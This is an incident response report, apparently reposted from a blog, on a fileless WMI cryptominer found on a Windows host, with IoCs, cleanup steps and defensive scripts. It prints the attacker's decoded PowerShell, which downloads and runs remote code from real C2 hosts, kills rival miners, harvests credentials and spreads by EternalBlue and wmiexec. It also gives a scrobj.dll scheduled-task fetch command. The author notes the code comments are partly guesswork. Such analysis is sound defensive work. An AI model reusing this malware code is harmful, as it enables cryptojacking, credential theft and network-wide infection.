Fileless Cryptomining Incident Response Report
Published: 2021-07-29

1.1 Situation Overview

Because of non-compliant or negligent operations during O&M, or insufficient protective capability that allowed malicious actions, the host was infected by a cryptomining program. The mining program downloads malicious code into WMI to achieve fileless mining and internal-network penetration, downloads a DDoS attack program, and uses a scheduled task to generate a version-checking malicious file automatically every 20 minutes.

1.2 Incident Summary

On 4 April 2019 a user alert was received: an internal host showed abnormally high CPU usage, and at the same time the network anomaly monitoring platform alerted that the host was actively connecting to a mining pool.

1.3 Analytical Approach

For a mining program to produce lasting, stable monetary value, four basic properties are indispensable: its core function, long-term execution, self-concealment and self-propagation. The analysis therefore followed the attacker's basic intent:

1. Check how the mining runs;

2. Check how it propagates itself;

3. Check how it keeps running long-term;

4. Check how it got into the operating system.

By analysing these stages, the aim is to close the loop on every malicious step of the attack chain.

2. Analysis and Handling of Host Mining Behaviour

2.1 Current State

The host's CPU usage was 75%; powershell.exe accounted for a large share of it, so it was examined.

2.2 Parent/Child Process Table

The process names, parent PIDs and PIDs obtained from "wmic process" were organised into the following table:

Caption         ParentProcessId   ProcessId
wininit.exe     348               388
services.exe    388               504
svchost.exe     504               624
WmiPrvSE.exe    624               5148
powershell.exe  5148              3964
powershell.exe  3964              3180

The CommandLine of each program is given in the following sections.
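An added example (not from the original report, and not the attacker's code): this PowerShell snippet rebuilds the process ancestry from Win32_Process and flags powershell.exe instances that were spawned by WmiPrvSE.exe or launched hidden with an encoded command, which is the chain shown in the table above. Get-Ancestry and $suspiciousArgs are my own names; it assumes an elevated session.

```powershell
# Added example, not from the original report: rebuild the process tree from
# Win32_Process and flag powershell.exe instances spawned by WmiPrvSE.exe or
# launched hidden with an encoded command (the chain seen in the table above).
# Get-Ancestry and $suspiciousArgs are my own names. Run as Administrator.
$procs = Get-CimInstance -ClassName Win32_Process |
    Select-Object ProcessId, ParentProcessId, Name, CommandLine
$byPid = @{}
foreach ($p in $procs) { $byPid[[uint32]$p.ProcessId] = $p }

function Get-Ancestry {
    # Walk ParentProcessId links upward; $seen guards against PID-reuse loops.
    param([uint32]$ProcId)
    $chain = @(); $seen = @{}
    while ($byPid.ContainsKey($ProcId) -and -not $seen.ContainsKey($ProcId)) {
        $seen[$ProcId] = $true
        $chain += "$($byPid[$ProcId].Name)($ProcId)"
        $ProcId = [uint32]$byPid[$ProcId].ParentProcessId
    }
    return ($chain -join ' <- ')
}

# -W Hidden and -E <base64> are the switches observed on PID 3964 in section 2.7.
$suspiciousArgs = '(?i)-W(indowStyle)?\s+Hidden|-E(nc(odedCommand)?)?\s+[A-Za-z0-9+/=]{20,}'

$findings = foreach ($p in ($procs | Where-Object { $_.Name -ieq 'powershell.exe' })) {
    $parent  = $byPid[[uint32]$p.ParentProcessId]
    $fromWmi = ($null -ne $parent) -and ($parent.Name -ieq 'WmiPrvSE.exe')
    $hidden  = [bool]($p.CommandLine -match $suspiciousArgs)
    if ($fromWmi -or $hidden) {
        [pscustomobject]@{
            ProcessId         = $p.ProcessId
            SpawnedByWmiPrvSE = $fromWmi
            HiddenOrEncoded   = $hidden
            Ancestry          = Get-Ancestry -ProcId $p.ProcessId
        }
    }
}
$findings | Format-Table -AutoSize
```

On the host in this report it would list PIDs 3964 and 3180 with the ancestry WmiPrvSE.exe <- svchost.exe <- services.exe <- wininit.exe.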

2.3 wininit.exe

CommandLine: wininit.exe

The Windows startup application. It starts services.exe (Service Control Manager), lsass.exe (Local Security Authority) and lsm.exe (Local Session Manager).

2.4 services.exe

CommandLine: C:\Windows\system32\services.exe

The Windows service management application.

2.5 svchost.exe

CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch

The DCOMLAUNCH service starts COM and DCOM servers in response to object activation requests.

2.6 WmiPrvSE.exe

CommandLine: C:\Windows\system32\wbem\wmiprvse.exe

wmiprvse.exe is part of the Microsoft Windows operating system; it processes WMI operations on behalf of the WinMgmt.exe program.

2.7 powershell.exe (PID 3964)

CommandLine: powershell.exe -NoP -NonI -W Hidden -E [base64-encoded command, omitted]

powershell.exe is a command-line shell and scripting environment. Its parameters are summarised below:

No.  Parameter   Description
1    -NoP        Do not load the Windows PowerShell profile
2    -NonI       Run non-interactively, without interacting with the user
3    -W Hidden   Hide the command-line window
4    -E          Accept a base64-encoded string version of the command

I don't write code myself, so the decoding of the base64 string above and the brief comments added to the code blocks are partly guesswork; the main point is that part of its content directs the next step toward WMI. As noted above, doing this during the response is best; at the time I used keyword searches to find material already written by experts to guide the next step:

 

 

 

$pin = new-object system.net.networkinformation.ping
$se=@(('update.7h4uk.com'),('info.7h4uk.com'),('111.90.145.52'),('185.234.217.139'))
$avgs = @()
$nic = 'update.7h4uk.com'
for($i=0;$i -le 3;$i++){
    $sum = 0
    $count = 0
    # Check whether each server is online and measure its latency, to pick the domain or IP to connect to
    for($j=1;$j -le 4;$j++){
        $tmp =($pin.send($se[$i])).RoundtripTime
        if ($tmp -ne 0){
                $count += 1
        }
        $sum += $tmp
    }
    if ($count -ne 0){
            $avgs += $sum/$count
    }else{
            $avgs += 0
    }
    if ($i -eq 0){
        if (($avgs[0] -le 300) -and ($avgs[0] -ne 0)){
            $nic = $se[0]
            break
        }
    }
    if ($i -eq 1){
        if ($avgs[1] -ne 0){
            if (($avgs[0] -le $avgs[1]) -and ($avgs[0] -ne 0)){
                $nic = $se[0]
                break
            }else{
                $nic = $se[1]
                break
            }
        }
    }
    if ($i -eq 2){
        if (($avgs[2] -le 300) -and ($avgs[2] -ne 0)){
            $nic = $se[2]
            break
        }
    }
    if ($i -eq 3){
        if ($avgs[3] -ne 0){
            if (($avgs[2] -le $avgs[3]) -and ($avgs[2] -ne 0)){
                $nic = $se[2]
                break
            }else{
                $nic = $se[3]
                break
            }
        }
    }
}
# If the server-side version differs from the local version, download antivirus.ps1 from the server
$nic=$nic+(':'+'443')
$ver=(New-Object Net.WebClient).DownloadString("http://$nic/ver.txt").Trim()
if($ver -ne $null){
    $ver_tmp=([WmiClass]'root\default:System_Anti_Virus_Core').Properties['ver'].Value
    if($ver -ne $ver_tmp){
        IEX (New-Object Net.WebClient).DownloadString("http://$nic/antivirus.ps1")
        return
    }
}
# Record the start time (system tick count)
$stime=[Environment]::TickCount
# Execute the "funs" property of the WMI class root\default:System_Anti_Virus_Core, which releases the WMI exec and EternalBlue attack code
$funs = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['funs'].Value
$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
iex $defun
# In the WMI root\subscription namespace, delete every filter-to-consumer binding whose filter does not match 'Windows Events'
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'Windows Events'} | Remove-WmiObject
# Collect the IDs of all powershell.exe processes, in descending order of CPU
[array]$psids= get-process -name powershell |sort cpu -Descending|ForEach-Object {$_.id}
$tcpconn = netstat -anop tcp
$exist=$False
# Check whether this machine is already mining for itself: whether a running powershell.exe has an ESTABLISHED TCP connection to an external address on port 80, 14444 or 14433; otherwise keep looping
if ($psids -ne $null )
{
    foreach ($t in $tcpconn)
    {
        $line =$t.split(' ')|?{$_}
        if ($line -eq $null)
        {continue}
        if (($psids -contains $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444") -or $t.contains(":14433")) )
        {
            $exist=$true
            break
        }
    }
}
!!!
RunDDOS "cohernece.exe"
KillBot('System_Anti_Virus_Core')
# Kill competing miners, i.e. processes with established connections to external ports 3333, 5555 or 7777
foreach ($t in $tcpconn)
    {
        $line =$t.split(' ')|?{$_}
        if (!($line -is [array])){continue}
        if(($line[-3].contains(":3333") -or $line[-3].contains(":5555") -or $line[-3].contains(":7777")) -and $t.contains("ESTABLISHED"))
        {
            $evid=$line[-1]
            Get-Process -id $evid| stop-process -force
        }
    }
# If not already mining (no connection to external port 14444/14433 and at most 8 powershell.exe running), execute the "mon" and "funs" properties of the WMI class root\default:System_Anti_Virus_Core to mine and penetrate the internal network
if (!$exist -and ($psids.count -le 8))
{
    $cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;`$funs= ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value;iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command  -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""
    $vbs = New-Object -ComObject WScript.Shell
    $vbs.run($cmdmon,0)
}
# Take the "mimi" property of root\default:System_Anti_Virus_Core into $mimi and check whether the result is 32 characters long; if not, write it to temp\a25hY2tlcmVk.txt
$NTLM=$False
$mimi = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['mimi'].Value
$a, $NTLM= Get-creds $mimi $mimi
if (($a -Split " ")[2].length -ne 32)
{
    ($a -Split " ")[2] |Out-File -Encoding ascii "$env:temp\a25hY2tlcmVk.txt"
}
$Networks = [System.Net.DNS]::GetHostByName($null).AddressList
# Assign the "ipsu" property to $ipsu
$ipsu = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['ipsu'].Value
# Assign the "i17" property to $i17
$i17 = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['i17'].Value
# Assign the "sc" property to $scba
$scba= ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['sc'].Value
# Decode the "sc" property into an array of 8-bit unsigned integers
[byte[]]$sc=[System.Convert]::FromBase64String($scba)
foreach ($Network in $Networks)
{
    # Format the IP address
    $IPAddress  = $Network.IPAddressToString
    # Skip link-local (169.254.x.x) addresses
    if ($IPAddress -match '^169.254'){continue}
    $SubnetMask  = '255.255.255.0'
    # Assign the IPs returned by Get-networkrange (this /24) to $ips_c
    $ips_c=Get-networkrange $IPAddress $SubnetMask
    # Assign the IPs returned by Get-IpInB to $ips_b
    $ips_b=Get-IpInB $IPAddress
    $ips=$ips_c+$ips_b
    $tcpconn = netstat -anop tcp
    # Collect peers of ESTABLISHED TCP connections that are not 127.0.0.1 and not already in the list (typically inbound sessions)
    foreach ($t in $tcpconn)
    {
        $line =$t.split(' ')|?{$_}
        if (!($line -is [array])){continue}
        if ($line.count -le 4){continue}
        # Split the foreign address and keep only the IP
        $i=$line[-3].split(':')[0]
        # If the TCP connection is ESTABLISHED, not 127.0.0.1 and not already in the target list, add it
        if ( ($line[-2] -eq 'ESTABLISHED') -and  ($i -ne '127.0.0.1') -and ($ips -notcontains $i))
        {
            $ips+=$i
        }
    }
    # Continue only if less than 1.5 hours (5400 s) have elapsed since the start
    if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}
    foreach ($ip in $ips)
    {
        if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}
        if ($ip -eq $IPAddress){continue}
        # MS17-010 (EternalBlue) attack
        if ((Test-Port $ip) -ne $false -and $ipsu -notcontains $ip)
        {
            $re=0
            if ($a.count -ne 0)
            {$re = test-ip -ip $ip -creds $a  -nic $nic -ntlm $NTLM }
            if ($re -eq 1){$ipsu=$ipsu +" "+$ip}
            else
            {
                $vul=[PingCastle.Scanners.m17sc]::Scan($ip)
                if ($vul -and $i17 -notcontains $ip)
                {
                   $res=eb7 $ip $sc
                   if (!($res -eq $true))
                   {eb8 $ip $sc}
                   $i17 = $i17 +" "+$ip
                }
            }
        }
    }
 }
# Create a ManagementClass object for the static class
$StaticClass=New-Object Management.ManagementClass('root\default:System_Anti_Virus_Core')
# Store the IPs of hosts compromised via wmiexec in the class's ipsu property
$StaticClass.SetPropertyValue('ipsu' ,$ipsu)
# Push the update
$StaticClass.Put()
# Store the IPs of hosts compromised via EternalBlue in the class's i17 property
$StaticClass.SetPropertyValue('i17' ,$i17)
# Push the update
$StaticClass.Put()

 

 

2.8 powershell.exe (PID 3180)

Its content duplicates the previous PowerShell payload; see section 2.7.

2.9 WmiClass Inspection

Analysis of the memory contents of PID 3964 shows that all of the malicious content is stored in the WMI class root\default:System_Anti_Virus_Core. When it is needed it is loaded directly into memory and executed, which is how local fileless mining and internal-network penetration are achieved.

The built-in Windows tool wbemtest.exe can be used to manage Windows Management Instrumentation.

Scrolling the drop-down list to the bottom reveals the properties that were present in the memory of PID 3964.

2.9.1 ver property (since I cannot code, the following is verified functionally at the packet level)

The DNS record is queried and the server is pinged to test whether it is online.

The packet capture shows that the first action is to verify the version; if the versions differ, antivirus.ps1 is downloaded.

After the update, the server-side and local versions match.

Server-side version (screenshot)

Local version (screenshot)

2.9.2 funs property

The funs content was decoded and uploaded to a cloud scanner for antivirus checks.

2.9.3 ipsu/i17/mimi/sc properties

ipsu and i17 were not populated because neither the wmiexec nor the MS17-010 attack succeeded.

mimi and sc were not analysed further because of my limited expertise.

2.9.4 mon property

Due to limited expertise this was not analysed at the code level; PID 3180 releases the mon content to carry out the mining.

2.9.5 Internal Network Penetration

Based on the memory contents of PID 3964 and PID 3180, both processes release the funs content to perform internal-network penetration.

Live hosts are identified at the ARP level:

The TCP three-way handshake is used to determine whether port 445 is open on hosts in the target range:

2.10 antivirus.ps1 Inspection

Because PID 3964 fetched the file and loaded it into memory without writing it to disk, and because the file could not be downloaded with a browser even when using the same request headers, analysis could not continue (it was later found that running the download from the command line and redirecting it to a file makes the file available for analysis). Judging from the process, the file includes at least the functions of modifying the WmiClass and downloading malicious programs such as cohernece.exe.

 

2.11 cohernece.exe Inspection

The file was created on 12 January 2019 at 01:30.

java-log-9527.log exists in the same directory; according to reference material, this file is the attack payload of cohernece.exe.

2.12 Correlation Check

Searching by name showed the file present in multiple directories, as marked by the red boxes in the screenshot.

Searching by the file's creation time found that, at the same time, in a very well-hidden directory:

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5

an .htm file is generated automatically every 20 minutes.

Decoding it, as shown in the screenshot, its name suggests it mainly checks the version and performs an update when the local and cloud versions differ.

The downloaded content is outlined below:

Because the files were generated at fixed intervals, the scheduled tasks were checked, revealing malicious scheduled tasks:

The two scheduled tasks run on a timer:

/u /s /i:http://update.7h4uk.com/antivirus.php scrobj.dll

The link above could not be downloaded as given; after replacing port 80 with 443 the download succeeded.

 

2.13 IoC

2.13.1 URL

update.7h4uk.com
info.7h4uk.com
f4keu.7h4uk.com
xmr-eu1.nanopool.org

2.13.2 IP

 


2.13.3 MD5

cohernece.exe  4fe2de6fbb278e56c23e90432f21f6c8
9527.log       c2e31d4b8d6f9169d4557587b9d595ec

3. Emergency Response

Based on the on-site situation and after confirmation with the user, the malicious program was removed from the internal host through the following steps:

1. Delete the scheduled tasks from Task Scheduler;

2. Kill, in order, PID 3964, PID 3180 and cohernece.exe;

3. Delete the funs, i17, ipsu, mimi, mon, sc and ver properties of root\default:System_Anti_Virus_Core in WMI;

4. Delete cohernece.exe and antivirus*.htm.
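An added example, not part of the original report and not the attacker's tooling: a PowerShell audit/remediation script that follows the four steps above. It assumes an elevated session on the affected host; the -Remediate switch and the variable names are mine, while the class, property names, ports, task action string, directory and file names are the values given earlier in this report.

```powershell
# Added example, not from the original report: audit and (with -Remediate) clean up
# the four persistence points listed above. Assumes an elevated session on the host;
# the -Remediate switch and variable names are mine, the values come from the report.
[CmdletBinding()]
param([switch]$Remediate)

$ns = 'root\default'; $class = 'System_Anti_Virus_Core'
$htmDir = "$env:SystemRoot\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5"
# Step 1: scheduled tasks whose action references scrobj.dll or the update domain (section 2.12).
foreach ($t in Get-ScheduledTask) {
    $acts = $t.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }
    if ($acts -match 'scrobj\.dll|7h4uk\.com') {
        Write-Output "Task: $($t.TaskPath)$($t.TaskName) -> $acts"
        if ($Remediate) { Unregister-ScheduledTask -TaskName $t.TaskName -TaskPath $t.TaskPath -Confirm:$false }
    }
}
# Step 2: powershell.exe / cohernece.exe holding established connections on the ports the payload checks.
$poolPorts = 80, 14444, 14433
$owners = Get-NetTCPConnection -State Established | Where-Object { $poolPorts -contains $_.RemotePort } |
          Select-Object -ExpandProperty OwningProcess -Unique
$procs = if ($owners) { Get-Process -Id $owners -ErrorAction SilentlyContinue | Where-Object { $_.Name -in 'powershell', 'cohernece' } }
foreach ($p in $procs) {
    Write-Output "Process: $($p.Name) PID $($p.Id)"
    if ($Remediate) { Stop-Process -Id $p.Id -Force }
}
# Step 3: the WMI class holding the payload; remove the seven properties the report deleted.
$cls = Get-CimClass -Namespace $ns -ClassName $class -ErrorAction SilentlyContinue
if ($cls) {
    $present = @($cls.CimClassProperties.Name)
    Write-Output "WMI class ${ns}:$class present with properties: $($present -join ', ')"
    if ($Remediate) {
        $mc = New-Object System.Management.ManagementClass("${ns}:$class")
        foreach ($n in 'funs', 'i17', 'ipsu', 'mimi', 'mon', 'sc', 'ver') {
            if ($present -contains $n) { $mc.Properties.Remove($n) }
        }
        [void]$mc.Put()
    }
}
# The payload prunes root\subscription bindings other than its own, so list what remains for review.
Get-CimInstance -Namespace root\subscription -ClassName __FilterToConsumerBinding | Select-Object Filter, Consumer
# Step 4: the 20-minute antivirus*.htm files and the dropped binary (the drive-wide search is slow).
$files = @(Get-ChildItem -Path $htmDir -Recurse -Force -Filter 'antivirus*.htm' -ErrorAction SilentlyContinue) +
         @(Get-ChildItem -Path "$env:SystemDrive\" -Recurse -Force -Filter 'cohernece.exe' -ErrorAction SilentlyContinue)
foreach ($f in $files) {
    Write-Output "File: $($f.FullName)"
    if ($Remediate) { Remove-Item -LiteralPath $f.FullName -Force }
}
```

Run it once without -Remediate to confirm the findings match the report (tasks, PIDs, class properties, files), then again with -Remediate; the remaining root\subscription bindings are listed rather than deleted because legitimate ones may exist.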

4. Baseline Protection Capability Check

4.1 Firewall and MS17-010

Port 445 was exposed without the MS17-010 patches installed, there was no third-party antivirus or application-layer firewall, and the local network-layer firewall was disabled, so inbound access to high-risk local ports could not be controlled.

4.2 Tomcat Logs

Tomcat access logging was not enabled.

 

5. Conclusions and Recommendations

5.1 Conclusions

The excessive CPU usage on the internal host was found to be caused by mining activity. Because Tomcat access logging was not enabled, the attack could not be traced at the web layer. However, based on the analysis in section 4.1, the malicious program described in section 2 is fully capable of automated lateral movement against inadequately protected hosts on the internal network.

5.2 Recommendations

To reduce the likelihood of security incidents such as ransomware or mining after an attacker obtains administrative privileges, the following measures are recommended as a minimum:

1. Strengthen ingress control; access to application systems should pass through multiple layers of application protection;

2. Internal management servers should be controlled and audited through a bastion host; external management servers should enter the internal network through an encrypted VPN and then be controlled and audited through a bastion host;

3. Strengthen egress control; for application systems that serve the internet or external parties, only port mapping or bidirectional address translation should be performed at the internet egress, and unless necessary the egress should not proxy application-system IPs out to the internet;

4. Application systems should undergo code audit and penetration testing before serving the internet or external parties;

5. Do not lower a server's security standard because it is a test server; by the weakest-link principle, a compromised test server can be used to pivot into the internal network. It is therefore reiterated that business servers should be prohibited from initiating connections to the internet unless necessary, to prevent administrative access from being reverse-shelled out to the internet after compromise;

6. Office endpoints must guard against USB-based phishing and cross-infection by malicious programs; avoid opening documents, programs or email attachments of unknown origin to prevent social-engineering phishing.

Reposted from: https://blog.csdn.net/systemino/article/details/95021219
